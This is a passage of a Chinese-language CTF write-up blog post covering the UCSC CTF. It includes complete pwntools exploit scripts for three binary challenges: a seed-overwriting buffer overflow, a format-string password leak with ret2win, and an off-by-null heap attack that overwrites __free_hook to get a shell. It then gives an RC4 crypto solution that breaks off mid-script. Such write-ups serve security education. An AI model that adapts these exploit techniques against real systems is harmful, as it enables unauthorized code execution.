{"id":1022,"date":"2025-04-30T17:18:51","date_gmt":"2025-04-30T09:18:51","guid":{"rendered":"http:\/\/8.141.27.105\/?p=1022"},"modified":"2025-04-30T17:19:26","modified_gmt":"2025-04-30T09:19:26","slug":"ucsc-ctf-wp","status":"publish","type":"post","link":"http:\/\/n0ps1ed.top\/index.php\/2025\/04\/30\/ucsc-ctf-wp\/","title":{"rendered":"UCSC CTF WP"},"content":{"rendered":"\n<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_71 counter-hierarchy ez-toc-counter ez-toc-transparent ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #f4f4f4;color:#f4f4f4\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #f4f4f4;color:#f4f4f4\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/04\/30\/ucsc-ctf-wp\/#PWN1_BoFido-ucsc\" title=\"PWN1 BoFido-ucsc\">PWN1 BoFido-ucsc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/04\/30\/ucsc-ctf-wp\/#PWN2_userlogin-ucsc\" title=\"PWN2 userlogin-ucsc\">PWN2 userlogin-ucsc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/04\/30\/ucsc-ctf-wp\/#PWN3_%E7%96%AF%E7%8B%82%E5%A4%8D%E5%88%B6-ucsc\" title=\"PWN3 \u75af\u72c2\u590d\u5236-ucsc\">PWN3 \u75af\u72c2\u590d\u5236-ucsc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/04\/30\/ucsc-ctf-wp\/#Crypto_4_XR4-ucsc\" title=\"Crypto 4 XR4-ucsc\">Crypto 4 XR4-ucsc<\/a><\/li><li class='ez-toc-page-1 ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/n0ps1ed.top\/index.php\/2025\/04\/30\/ucsc-ctf-wp\/#Reverse_2_easy_re-ucsc\" title=\"Reverse 2 easy_re-ucsc\">Reverse 2 easy_re-ucsc<\/a><\/li><\/ul><\/nav><\/div>\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"PWN1_BoFido-ucsc\"><\/span><strong>PWN1 BoFido-ucsc<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>Srand\u4f2a\u968f\u673a\u7ed5\u8fc7\uff0cRead\u51fd\u6570\u53ef\u4ee5\u8986\u76d6seed\uff0c\u628aseed\u8986\u76d6\u6210\u56fa\u5b9a\u503c\uff08\u6211\u9009\u4e861\uff09\uff0c\u7136\u540e\u8fd0\u884c\u4e00\u904d\u5f97\u5230\u56fa\u5b9a\u7684\u6570\u5b57\uff0c\u5168\u90e8\u7b54\u5bf9\u5373\u53ef\u62ffshell:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/B38BD7778B1B4DFFB910E5221E341647.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"643\" height=\"513\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/B38BD7778B1B4DFFB910E5221E341647.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1023\"  sizes=\"auto, (max-width: 643px) 100vw, 643px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/D5C0C0F074BD4595ADAE82FB305931BF.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"668\" height=\"439\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/D5C0C0F074BD4595ADAE82FB305931BF.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1024\"  sizes=\"auto, (max-width: 668px) 100vw, 668px\" \/><\/div><\/figure>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext.log_level = 'debug'\n\np = process('\/home\/monke\/PWN\/UCSC\/BoFido')\np = remote(\"39.107.58.236\",44059)\n# \u8986\u76d6seed\u503c\u4e3a1\u7684payload\npayload = b'A' * 32 + p32(1)\np.sendlineafter(b\"Enter your name:\", payload)\np.recvuntil(b\"Now start your game!\")\n\n# \u4f7f\u7528\u4ece\u7a0b\u5e8f\u8f93\u51fa\u4e2d\u83b7\u53d6\u7684\u5b9e\u9645\u968f\u673a\u6570\nwinning_numbers = &#91;\n    (163, 151, 162),  # \u7b2c1\u8f6e\u7684\u5b9e\u9645\u968f\u673a\u6570\n    (85, 83, 190),    # \u7b2c2\u8f6e\n    (241, 252, 249),  # \u7b2c3\u8f6e\n    (121, 107, 82),   # \u7b2c4\u8f6e\n    (20, 19, 233),    # \u7b2c5\u8f6e\n    (226, 45, 81),    # \u7b2c6\u8f6e\n    (142, 31, 86),    # \u7b2c7\u8f6e\n    (8, 87, 39),      # \u7b2c8\u8f6e\n    (167, 5, 212),    # \u7b2c9\u8f6e\n    (208, 82, 130)    # \u7b2c10\u8f6e\n]\n\n# \u63d0\u4ea4\u6bcf\u8f6e\u7684\u6570\u5b57\nfor i, (n1, n2, n3) in enumerate(winning_numbers, 1):\n    p.recvuntil(f\"&#91;+] Round {i}\".encode())\n    p.sendline(f\"{n1} {n2} {n3}\".encode())\n    \n# \u83b7\u53d6shell\np.interactive()<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><\/h3>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"PWN2_userlogin-ucsc\"><\/span><strong>PWN2 userlogin-ucsc<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/9BDE7264BC4F481299570423C500222C-1024x612.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"612\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/9BDE7264BC4F481299570423C500222C-1024x612.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1026\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u5148\u7528generatePassword\u521d\u59cb\u5316\u4e86\u4e00\u4e2a\u5bc6\u94a5\uff0c\u5bc6\u94a5\u662f\u968f\u673a\u751f\u6210\u7684<\/p>\n\n\n\n<p>\u7136\u540e\u8fdb\u5165login\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/9B282EA4F86C47E2B6891A1D1A36E32C.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"638\" height=\"426\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/9B282EA4F86C47E2B6891A1D1A36E32C.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1027\"  sizes=\"auto, (max-width: 638px) 100vw, 638px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e24\u4e2a\u5224\u65ad\uff0c\u7b2c\u4e00\u4e2a\u5224\u65ad\u8f93\u5165\u662f\u4e0d\u662fsupersecureuser, \u7b2c\u4e8c\u4e2a\u5224\u65ad\u8ddf\u8f93\u5165\u8ddf\u5bc6\u94a5\u662f\u5426\u4e00\u81f4\u3002\u7136\u540e\u5206\u522b\u8fdb\u5165user\u548croot\u51fd\u6570\u3002<\/p>\n\n\n\n<p>user\u51fd\u6570\uff1a<\/p>\n\n\n\n<p>\u65e0\u6ea2\u51fa\uff0c\u4f46\u6709fmt<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/9FA66F238D664A84BB0ED9ECBE5BED68.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"582\" height=\"278\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/9FA66F238D664A84BB0ED9ECBE5BED68.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1025\"  sizes=\"auto, (max-width: 582px) 100vw, 582px\" \/><\/div><\/figure>\n\n\n\n<p>root\u51fd\u6570\uff1a<\/p>\n\n\n\n<p>\u6709\u6ea2\u51fa<\/p>\n\n\n\n\n\n<p>\u601d\u8def\u5c31\u662f\uff0c\u5148\u7528\u4e24\u6b21user\u51fd\u6570\u6765\u6cc4\u9732\u5bc6\u94a5\uff08\u56e0\u4e3a\u5bc6\u94a5\u957f16B\uff0c\u6240\u4ee5\u8981\u4e24\u6b21\uff09\uff0c\u7136\u540e\u8f93\u5165\u5bc6\u94a5\u8fdb\u5165root\u6765\u8fdb\u884c\u6ea2\u51fa\u5c31\u884c\uff0c\u672c\u9898\u8fd8\u7ed9\u4e86\u540e\u95e8\u51fd\u6570shell\uff0c\u76f4\u63a5\u7528\u5c31\u884c\u3002<\/p>\n\n\n\n<p>\u5bc6\u94a5\u7684\u6cc4\u9732\u9700\u8981\u52a8\u8c03\uff1a<\/p>\n\n\n\n<p>\u57fa\u7840\u504f\u79fb\u662f6<\/p>\n\n\n\n\n\n<p>\u5bc6\u94a5\u4f4d\u7f6e\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/65DD857EAC7341ACADCD1DB44C02D686-1.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"785\" height=\"597\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/65DD857EAC7341ACADCD1DB44C02D686-1.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1029\"  sizes=\"auto, (max-width: 785px) 100vw, 785px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/0C0C60F3D6964122BFE2907CD5055FBA.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"577\" height=\"287\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/0C0C60F3D6964122BFE2907CD5055FBA.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1030\"  sizes=\"auto, (max-width: 577px) 100vw, 577px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0d\u65adfuzz\u5f97\u5230\u5bc6\u94a5\u504f\u79fb\u662f22\u548c23\u3002<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/8B7C24A91FC04C148DB673D736024DEF.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"902\" height=\"448\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/8B7C24A91FC04C148DB673D736024DEF.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1031\"  sizes=\"auto, (max-width: 902px) 100vw, 902px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import*\nfrom LibcSearcher import*\ncontext(arch=\"amd64\", os=\"linux\", log_level=\"debug\")\np = process(\"\/home\/monke\/pwn\/uctccttf\/login\/userlogin\")\np=remote(\"182.92.65.134\",41638)\n#\u8fde\u63a5\u8fdc\u7a0b\nret=0x401016\np.sendlineafter(\"Password: \",b\"supersecureuser\")\np.sendlineafter(\"Write Something\\n\",b\"%22$p\")\npasswd1=p.recv(18)\nprint(passwd1)\npasswd1=int(passwd1,16)\nprint(passwd1)\np.sendlineafter(\"Password: \",b\"supersecureuser\")\np.sendlineafter(\"Write Something\\n\",b\"%23$p\")\npasswd2=p.recv(18)\nprint(passwd2)\npasswd2=int(passwd2,16)\nprint(passwd2)\np.sendlineafter(\"Password: \",p64(passwd1)+p64(passwd2))\npayload=cyclic(32+8)+p64(ret)+p64(0x401261)\np.sendlineafter(\"Note: \\n\",payload)\np.interactive()<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"PWN3_%E7%96%AF%E7%8B%82%E5%A4%8D%E5%88%B6-ucsc\"><\/span><strong>PWN3 \u75af\u72c2\u590d\u5236-ucsc<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>off by null\u6a21\u677f\u5806\u9898\uff0c\u5229\u7528off by null\u5411\u524d\u5408\u5e76\uff0c\u5207\u5272unsorted bin\u628amain_arena\u6324\u5230\u53ef\u4ee5show\u7684chunk\u4e0a\u6cc4\u9732\u57fa\u5740\uff0c\u7136\u540e\u52ab\u6301free_hook\u4e3asystem\u5373\u53ef\u62ffshell<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/6131F40753D743FEB3ED9ADADEF70919.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"830\" height=\"440\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/6131F40753D743FEB3ED9ADADEF70919.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1032\"  sizes=\"auto, (max-width: 830px) 100vw, 830px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *\n\ncontext(arch='amd64', os='linux', log_level='info')\n#p = process('\/home\/monke\/PWN\/UCSC\/PWN\/pwn')\np = remote('39.107.58.236',44928)  # \u8fdc\u7a0b\u5730\u5740\n\ndef create(index, size):\n    p.sendlineafter(b':', b'1')\n    p.sendlineafter(b'Index: ', str(index).encode())\n    p.sendlineafter(b'Size ', str(size).encode())\n\ndef edit(index, content):\n    p.sendlineafter(b':', b'2')\n    p.sendlineafter(b'Index: ', str(index).encode())\n    p.sendlineafter(b'Content: ', content)\n\ndef show(index):\n    p.sendlineafter(b':', b'3')\n    p.sendlineafter(b'Index: ', str(index).encode())\n    p.recvuntil(b'Content: ')\n    return p.recvline()\n\ndef delete(index):\n    p.sendlineafter(b':', b'4')\n    p.sendlineafter(b'Index: ', str(index).encode())\n\nfor i in range(7):\n    create(i, 0xf0)  # \u5806\u57570-6\uff0c\u586b\u5145tcache\ncreate(7, 0xf0)     # \u5806\u57577\uff0cunsorted bin\ncreate(8, 0x18)     # \u5806\u57578\uff0c\u8d8a\u754c\n\ncreate(9, 0xf0)     # \u5806\u57579\uff0c\u5408\u5e76\ncreate(10, 0x28)    # \u5806\u575710\uff0c\u9694\u79bbtop chunk\n\n\nfor i in range(7):\n    delete(i)  # \u5806\u57570-6\u8fdb\u5165tcache bin&#91;0xf0]\n\ndelete(7)           # \u5806\u57577\u8fdb\u5165unsorted bin\nedit(8, b'A'*0x10)  # \u8d8a\u754c\u5199\\0\uff0c\u8986\u76d6\u5806\u57579\u7684prev_size\u4f4e\u5b57\u8282\ndelete(8)           # \u91ca\u653e\u5806\u57578\ncreate(8, 0x18)     # \u91cd\u7528\u5806\u57578\nedit(8, b'A'*0x10 + p64(0x120))  # \u8986\u76d6\u5806\u57579\u7684prev_size\ndelete(9)           # \u89e6\u53d17+8+9\u5408\u5e76\u5230unsorted bin\n\ncreate(7, 0xd0)     # \u5207\u5272unsorted bin\ncreate(9, 0x10)     # \u8c03\u6574\u5e03\u5c40\n\n\nshow(8)\nleak_data = show(8).strip()\nif leak_data == b'(null)':\n    log.error('show(8) failed, heap memory corrupted')\n    exit(1)\nleak = u64(leak_data.ljust(8, b'\\x00'))  \n\nprint(hex(leak))\n\n#gdb.attach(p)\nlibc=ELF(\"\/home\/monke\/Desktop\/glibc-all-in-one\/libs\/2.27-3ubuntu1.5_amd64\/libc.so.6\")\nlibc_base=leak-0x3ebca0\nfree_hook = libc_base + libc.sym&#91;'__free_hook']\nsystem=libc_base + libc.sym&#91;'system']\nprint(hex(libc_base))\nprint(hex(free_hook))\n\ndelete(7)\ndelete(9)\nfor i in range(7):\n    create(i, 0xf0)  # \u91cd\u65b0\u5206\u914d\u5806\u57570-6\ncreate(9, 0x10)\ncreate(7, 0x10)\n\n# attack\ncreate(11, 0xf0)\ncreate(12, 0xf0)\ncreate(13, 0x20)\nfor i in range(7):\n    delete(i)  # \u586b\u6ee1tcache bin&#91;0xf0]\ndelete(11)\ndelete(10)\ncreate(10, 0x28)\nedit(10, b'A'*0x20 + p64(0x130))  # \u8d8a\u754c\u5199\uff0c\u8986\u76d6\u5806\u575711\u7684prev_size\ndelete(10)\ndelete(12)\ncreate(0, 0x80)\ncreate(1, 0x80)\nedit(1, b'A'*0x60 + p64(0x100) + p64(0x30) + p64(free_hook))  # \u5199\u5165__free_hook\n\n# \u89e6\u53d1shell\ncreate(2, 0x20)\ncreate(3, 0x20)\nedit(3, p64(system))\ncreate(4, 0xf0)\nedit(4, b'\/bin\/sh\\x00')\ndelete(4)  # system(\"\/bin\/sh\")\n\np.interactive()<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"Crypto_4_XR4-ucsc\"><\/span><strong>Crypto 4 XR4-ucsc<\/strong><span class=\"ez-toc-section-end\"><\/span><\/h3>\n\n\n\n<p>\u5148\u89e3\u5bc6RC4\u5f97\u5230\u79cd\u5b50\u503c\uff0c\u7136\u540e\u7528\u8be5\u79cd\u5b50\u503c\u751f\u6210\u968f\u673a\u6570\uff0c\u4e0edata\u6570\u7ec4\u5f02\u6216\u5f97\u5230flag<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/ADE07A96001E4B5FBC7E69F7B5798ABD-1.jpg'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"581\" height=\"299\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2025\/04\/ADE07A96001E4B5FBC7E69F7B5798ABD-1.jpg\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1034\"  sizes=\"auto, (max-width: 581px) 100vw, 581px\" \/><\/div><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>Part1:\nimport base64\n\nciphertext = \"MjM184anvdA=\"\nkey = \"XR4\"\n\n# RC4\u521d\u59cb\u5316\ndef init_sbox(key):\n    s_box = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + s_box&#91;i] + ord(key&#91;i % len(key)])) % 256\n        s_box&#91;i], s_box&#91;j] = s_box&#91;j], s_box&#91;i]\n    return s_box\n\n# RC4\u89e3\u5bc6\ndef decrypt(cipher, box):\n    res = &#91;]\n    i = j = 0\n    cipher_bytes = base64.b64decode(cipher)\n    for s in cipher_bytes:\n        i = (i + 1) % 256\n        j = (j + box&#91;i]) % 256\n        box&#91;i], box&#91;j] = box&#91;j], box&#91;i]\n        t = (box&#91;i] + box&#91;j]) % 256\n        k = box&#91;t]\n        res.append(chr(s ^ k))\n    return (''.join(res))\n\nbox = init_sbox(key)\na = decrypt(ciphertext, box)\nprint(\"Decrypted value:\", a)\n\n\nPart2:\nimport random\nimport numpy as np\n\n# \u5b9a\u4e49\u8f6c\u7f6e\u77e9\u9635\ntransposed_matrix = np.array(&#91;\n    &#91;1, 111, 38, 110, 95, 44],\n    &#91;11, 45, 58, 39, 84, 1],\n    &#91;116, 19, 113, 60, 91, 118],\n    &#91;33, 98, 38, 57, 10, 29],\n    &#91;68, 52, 119, 56, 43, 125],\n    &#91;32, 32, 7, 26, 41, 41]\n])\n\n# \u5c06\u8f6c\u7f6e\u77e9\u9635\u8f6c\u7f6e\u56de\u6765\u5e76\u5c55\u5e73\u4e3a\u4e00\u7ef4\u6570\u7ec4\ndata = transposed_matrix.T.reshape(-1)\n\ndef random_num(seed_num):\n    random.seed(seed_num)\n    flag = &#91;]\n    for i in range(36):\n        # \u751f\u6210\u968f\u673a\u6570\u5e76\u53d6\u524d\u4e24\u4f4d\n        rand_val = int(str(random.random()*10000)&#91;:2])\n        # \u4e0edata\u4e2d\u7684\u503c\u5f02\u6216\n        flag_char = chr(rand_val ^ data&#91;i])\n        flag.append(flag_char)\n    return ''.join(flag)\n\nseed = 